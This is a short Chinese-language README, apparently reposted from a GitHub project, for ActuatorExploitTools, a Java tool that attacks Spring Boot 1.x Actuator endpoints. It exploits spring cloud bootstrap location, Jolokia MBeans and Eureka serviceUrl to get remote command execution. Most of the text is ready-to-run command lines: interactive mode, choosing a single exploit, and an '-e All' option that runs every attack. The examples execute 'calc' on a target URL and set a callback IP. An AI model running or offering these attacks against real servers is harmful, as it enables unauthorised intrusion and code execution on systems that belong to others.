ActuatorExploit工具

一款用于攻击spring boot actuator的集成环境，目前集成三种攻击方式，仅支持攻击spring boot 1.x

• spring cloud bootstrap location

• jolokia mbeans

• eureka serviceUrl

工具需要在与目标网络连通的机器上运行，支持交互式攻击和选择Exp自动攻击，交互式攻击适用于众测VPN场景

直接运行即可看到工具说明

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar

交互式攻击：

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc

选择Exp攻击：

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e JolokiaMbean

或者你不想选，可以直接-e All，将会用三种方式攻击

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e All

自动攻击，对于修改配置的攻击方式会在攻击完成时还原配置，默认还原为空，暂不支持自定义参数

文章来源：

https://github.com/r00tuser111/ActuatorExploitTools